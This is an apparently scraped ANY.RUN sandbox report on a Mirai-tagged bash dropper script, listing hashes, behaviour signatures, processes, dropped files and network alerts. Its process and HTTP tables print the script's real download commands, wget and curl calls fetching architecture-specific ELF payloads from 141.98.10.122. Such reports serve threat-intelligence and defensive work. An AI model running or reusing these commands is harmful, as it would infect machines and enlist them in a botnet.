File name:

bash.sh

Full analysis: https://app.any.run/tasks/3799e4df-9756-48fc-8d51-e047747791ab
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: March 26, 2025, 09:23:00
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5:

E9D282FE04078B2D45522FACFCE2DF0B

SHA1:

3CF77DFBBC7CF114515F94E5ECD0C38C3819FD83

SHA256:

8325AD7EBED7FDD287CC0CD89F81A51617A64B38D09FA3D84C9141477E0DD415

SSDEEP:

48:YelMe3aepoHekfeQG92eRU8HYLLNeGrHJe/8DelaDe9hSLo:YhNRH/xN7HJRJq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • GoldAge3ATOx64 (PID: 40970)
      • GoldAge3ATOx86 (PID: 41008)

  • SUSPICIOUS

    • Uses wget to download content

      • bash (PID: 40670)

    • Executes commands using command-line interpreter

      • sudo (PID: 40669)

    • Modifies file or directory owner

      • sudo (PID: 40666)

    • Reads passwd file

      • curl (PID: 40673)
      • gvfs-udisks2-volume-monitor (PID: 41173)
      • gdm-session-worker (PID: 41023)
      • gnome-shell (PID: 41132)
      • dumpe2fs (PID: 40695)
      • dumpe2fs (PID: 40707)

    • Connects to the server without a host name

      • curl (PID: 40673)
      • wget (PID: 40713)
      • wget (PID: 40744)
      • wget (PID: 40778)
      • wget (PID: 40811)
      • wget (PID: 40845)
      • wget (PID: 40875)
      • wget (PID: 40906)
      • wget (PID: 40939)
      • wget (PID: 40975)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 40670)

    • Potential Corporate Privacy Violation

      • wget (PID: 40713)
      • curl (PID: 40673)
      • wget (PID: 40744)
      • wget (PID: 40778)
      • wget (PID: 40811)
      • wget (PID: 40845)
      • wget (PID: 40906)
      • wget (PID: 40875)
      • wget (PID: 40939)
      • wget (PID: 40975)

    • Creates files in the user directory

      • bash (PID: 40670)

    • Reads network configuration

      • GoldAge3ATOx64 (PID: 40967)
      • GoldAge3ATOx64 (PID: 40970)

    • Gets active TCP connections

      • GoldAge3ATOx64 (PID: 40967)
      • GoldAge3ATOx64 (PID: 40970)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • gnome-shell (PID: 41132)

    • Modifies bash configuration script

      • bash (PID: 40670)

    • Contacting a server suspected of hosting an CnC

      • GoldAge3ATOx64 (PID: 40970)
      • GoldAge3ATOx86 (PID: 41008)

  • INFO

    • Checks timezone

      • wget (PID: 40713)
      • wget (PID: 40744)
      • wget (PID: 40778)
      • wget (PID: 40811)
      • wget (PID: 40845)
      • wget (PID: 40875)
      • wget (PID: 40906)
      • wget (PID: 40939)
      • wget (PID: 40975)
      • gdm-session-worker (PID: 41023)
      • gnome-shell (PID: 41132)
      • dumpe2fs (PID: 40695)
      • dumpe2fs (PID: 40707)

    • Creates file in the temporary folder

      • wget (PID: 40713)
      • curl (PID: 40673)
      • curl (PID: 40714)
      • curl (PID: 40745)
      • curl (PID: 40779)
      • curl (PID: 40812)
      • wget (PID: 40778)
      • wget (PID: 40845)
      • curl (PID: 40846)
      • curl (PID: 40876)
      • curl (PID: 40940)
      • wget (PID: 40906)
      • curl (PID: 40907)
      • wget (PID: 40975)
      • curl (PID: 40976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
450
Monitored processes
228
Malicious processes
7
Suspicious processes
7

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget no specs curl snap-seccomp no specs snap-confine no specs dumpe2fs no specs snap-update-ns no specs dumpe2fs no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs bash no specs rm no specs rm no specs wget curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs goldage3atox64 no specs rm no specs rm no specs wget goldage3atox64 no specs goldage3atox64 no specs #MIRAI goldage3atox64 goldage3atox64 no specs goldage3atox64 no specs curl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs chmod no specs goldage3atox86 no specs rm no specs rm no specs goldage3atox86 no specs goldage3atox86 no specs #MIRAI goldage3atox86 goldage3atox86 no specs goldage3atox86 no specs dash no specs gdm-session-worker no specs dash no specs dash no specs systemd-user-runtime-dir no specs systemd no specs systemd no specs systemd no specs systemd no specs 30-systemd-environment-d-generator no specs systemd-xdg-autostart-generator no specs systemctl no specs pipewire no specs pipewire-media-session no specs pulseaudio no specs snap-confine no specs gdm-wayland-session no specs tracker-extract-3 no specs dbus-daemon no specs dbus-run-session no specs dbus-daemon no specs gvfsd no specs gnome-session-binary no specs gvfsd no specs snap-seccomp no specs gvfsd-fuse no specs udevadm no specs fusermount3 no specs xdg-document-portal no specs gst-plugin-scanner no specs gst-plugin-scanner no specs xdg-permission-store no specs session-migration no specs fusermount3 no specs dash no specs gsettings no specs gsettings no specs python3.10 no specs snap-confine no specs snap-confine no specs snap-update-ns no specs python3.10 no specs dash no specs gsettings no specs gsettings no specs gnome-shell no specs tracker-miner-fs-3 no specs dbus-daemon no specs at-spi-bus-launcher no specs dbus-daemon no specs xwayland no specs gvfs-udisks2-volume-monitor no specs gvfs-mtp-volume-monitor no specs gvfs-gphoto2-volume-monitor no specs gvfs-goa-volume-monitor no specs dbus-daemon no specs goa-daemon no specs dbus-daemon no specs goa-identity-service no specs gvfs-afc-volume-monitor no specs systemd-localed no specs dbus-daemon no specs xdg-permission-store no specs geoclue no specs dbus-daemon no specs dbus-daemon no specs gjs-console no specs at-spi2-registryd no specs gsd-sharing no specs ibus-daemon no specs gsd-wacom no specs gsd-color no specs gsd-keyboard no specs python3.10 no specs gsd-print-notifications no specs gsd-rfkill no specs gsd-smartcard no specs gsd-datetime no specs gsd-media-keys no specs gsd-screensaver-proxy no specs gsd-sound no specs gsd-a11y-settings no specs gsd-housekeeping no specs gsd-power no specs systemd-hostnamed no specs dbus-daemon no specs false no specs dash no specs xkbcomp no specs gsd-print-notifications no specs gsd-printer no specs ibus-engine-m17n no specs fprintd no specs ibus-daemon no specs dash no specs python3.10 no specs xkbcomp no specs ibus-engine-m17n no specs ibus-engine-mozc no specs spice-vdagent no specs xbrlapi no specs ibus-engine-unikey no specs dbus-daemon no specs gvfsd no specs ibus-dconf no specs dbus-daemon no specs ibus-portal no specs ibus-engine-mozc no specs ibus-engine-unikey no specs dbus-daemon no specs gjs-console no specs ibus-dconf no specs ibus-daemon no specs ibus-x11 no specs dbus-daemon no specs ibus-portal no specs ibus-engine-simple no specs tracker-extract-3 no specs gvfsd-metadata no specs

Process information

PID
CMD
Path
Indicators
Parent process
40665/bin/sh -c "sudo chown user /home/user/Desktop/bash\.sh && chmod +x /home/user/Desktop/bash\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/bash\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40666sudo chown user /home/user/Desktop/bash.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40667chown user /home/user/Desktop/bash.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40668chmod +x /home/user/Desktop/bash.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40669sudo -iu user /home/user/Desktop/bash.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
40670/bin/bash /home/user/Desktop/bash.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40671/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40672wget --quiet 141.98.10.122/GoldAge3ATOarm/usr/bin/wgetbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40673/snap/curl/1754/bin/curl -s -O 141.98.10.122/GoldAge3ATOarm/snap/curl/1754/bin/curl
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
40686/snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info/snap/snapd/20290/usr/lib/snapd/snap-seccompcurl
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
76
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
40672wget/tmp/GoldAge3ATOarmbinary
MD5:
SHA256:
40713wget/tmp/GoldAge3ATOarm6binary
MD5:
SHA256:
40744wget/tmp/GoldAge3ATOm68kbinary
MD5:
SHA256:
40778wget/tmp/GoldAge3ATOmipsbinary
MD5:
SHA256:
40811wget/tmp/GoldAge3ATOmpslbinary
MD5:
SHA256:
40845wget/tmp/GoldAge3ATOppcbinary
MD5:
SHA256:
40875wget/tmp/GoldAge3ATOsh4binary
MD5:
SHA256:
40906wget/tmp/GoldAge3ATOspcbinary
MD5:
SHA256:
40939wget/tmp/GoldAge3ATOx64binary
MD5:
SHA256:
40975wget/tmp/GoldAge3ATOx86binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
30
DNS requests
11
Threats
37

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
195.181.175.40:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
GET
204
185.125.190.18:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
40673
curl
GET
200
141.98.10.122:80
http://141.98.10.122/GoldAge3ATOarm
unknown
unknown
GET
200
141.98.10.122:80
http://141.98.10.122/GoldAge3ATOm68k
unknown
unknown
40744
wget
GET
200
141.98.10.122:80
http://141.98.10.122/GoldAge3ATOm68k
unknown
unknown
GET
200
141.98.10.122:80
http://141.98.10.122/GoldAge3ATOarm6
unknown
unknown
GET
200
141.98.10.122:80
http://141.98.10.122/GoldAge3ATOarm
unknown
unknown
40713
wget
GET
200
141.98.10.122:80
http://141.98.10.122/GoldAge3ATOarm6
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
185.125.190.18:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
212.102.56.179:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
224.0.0.251:5353
unknown
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
141.98.10.122:80
UAB Host Baltic
LT
unknown
40673
curl
141.98.10.122:80
UAB Host Baltic
LT
unknown
40713
wget
141.98.10.122:80
UAB Host Baltic
LT
unknown
40744
wget
141.98.10.122:80
UAB Host Baltic
LT
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.18
  • 91.189.91.96
  • 91.189.91.49
  • 185.125.190.17
  • 185.125.190.97
  • 185.125.190.49
  • 185.125.190.96
  • 185.125.190.48
  • 91.189.91.97
  • 91.189.91.48
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::196
whitelisted
odrs.gnome.org
  • 212.102.56.179
  • 169.150.255.180
  • 195.181.175.41
  • 169.150.255.183
  • 37.19.194.81
  • 195.181.170.19
  • 207.211.211.26
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
whitelisted
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.54
  • 185.125.188.59
  • 185.125.188.55
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
whitelisted
google.com
  • 142.250.185.174
  • 2a00:1450:4001:806::200e
whitelisted
14.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 21
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40673
curl
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
40673
curl
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40713
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
40744
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
bash.sh